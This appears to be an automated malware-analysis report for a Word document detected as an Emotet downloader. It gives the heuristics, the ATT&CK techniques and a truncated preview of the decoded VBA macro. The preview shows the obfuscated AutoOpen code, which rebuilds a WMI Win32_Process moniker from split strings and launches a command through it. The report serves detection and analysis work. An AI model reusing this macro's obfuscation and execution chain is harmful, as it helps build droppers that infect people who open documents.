MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen function, which is a common technique for Emotet. The macro utilizes GetObject and CreateObject to instantiate WMI and launch a process, specifically targeting 'winmgmts' for process creation. This indicates the macro's intent is to download and execute a second-stage payload.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6964070-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6964070-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4923 bytes |
SHA-256: 07d013dc8e3a355d9fe2cb46ffccf3608fbcbc4fe0c40ad5831a49038ff75185 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "s76753"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "i659_4"
Attribute VB_Base = "0{055885CB-4D23-42A8-9E8E-94D203285A59}{EEE211E3-0AA4-48A5-83A0-BAF936A399F4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "H48_782"
Attribute VB_Name = "G385441"
Attribute VB_Name = "C_757645"
Attribute VB_Name = "Z347027"
Attribute VB_Name = "i53486"
Attribute VB_Name = "t2550951"
Attribute VB_Base = "0{012F8316-9F9C-49C0-B0F4-F7B644B4DE4F}{7AC199C1-C367-4731-904F-20D826AB32FF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "O53012"
Function J42_489(F58898)
While v6924051 And w1___490
'H857588s359__A0033180n_863_36
Wend
While i7459943 And T1984215
'D50657l58028Z36542s3625924
Wend
Set J42_489 = CVar(F58898)
While i292831 And V02095
'h8798_S93423_r94792W_03804
Wend
While C9291856 And H_269176
'O034989A0442576z82092k618_51
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While c_8955 And F3026439
'J79106q896224i535311w067_0
Wend
While h282879 And n507_2
'V084148z3657578N_82471B5_7536
Wend
While Y86_477_ And G094_30
'N8_77680n74901__G_91078_f55021
Wend
Call X61664
While Y9884740 And E981060
'p45073K065687E33847z03238
Wend
While M469_0_ And I0_2931
'I9360213r376_4_4P234570p3___0
Wend
While D7684_ And Y_822219
'v3910444o66562o4921914W04257
Wend
End Sub
Attribute VB_Name = "C93518"
Function X61664()
On Error Resume Next
While v366838 And D88_42
'R7142248o7307_2o_2419N_00558
Wend
While v7662263 And Z299088
'Q99752_7z396425_w538453K190_33
Wend
While f438055 And o29819
'h6157567l637744J05981J46259
Wend
P115854 = i659_4.P4905_5 + t2550951.z__130 + i659_4.P4905_5.ControlSource + t2550951.K_0_21 + i659_4.P4905_5.PasswordChar + i659_4.P4905_5 + t2550951.M35945 + i659_4.P4905_5.PasswordChar + i659_4.P4905_5.PasswordChar + t2550951.j018245 + i659_4.P4905_5 + t2550951.Z1189_4 + i659_4.P4905_5.ControlTipText
While D4855741 And V8_0657
'v4559575n05_89t230_91q5396_
Wend
While i1_1669_ And b077_014
'w52510__V5539851D40368V8467193
Wend
While H2532_ And b078712
'I624411O00354W3621689P982703
Wend
Set T452521 = J42_489(GetObject("winmgmt" + "s:Wi" + "n3" + "2_Pr" + "ocess"))
While q5019527 And c0281_
'j62_649z09419J63872s383411
Wend
While q23189 And X832816
'd68362L2429176W56_712i84074
Wend
While J773572 And X119_84
'H3536876i_7_965G842717N62115
Wend
T452521.Create d09064 + P115854 + L97_717, U_015368, u10471, a80964
While i92_82 And c34_4505
'N364797O081866_T128_1j229202
Wend
While w27916 And u4_985
'U83759j898004_V50244_1a836_09
Wend
End Function
Attribute VB_Name = "O3541311"
Public Function u10471()
While Z59524 And R2290302
'z_59_0w031543Z8307707o8309_
Wend
While G7463_72 And q341043
'j887856K570484G88707V266717
Wend
While O726542 And S12124_2
'B3424992o63624l8431503P09025
Wend
Set u10471 = J42_489(GetObject("winmgmt" + "s:Wi" + "n3" + "2_Pr" + "ocess" + "S" + "tartup"))
While D1383169 And X19165
'c522639S67699O1591705R03_991
Wend
While G757379 And C01456
'E23862u3736_v92703v1021064
Wend
c052037 = vbError - vbError
While
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.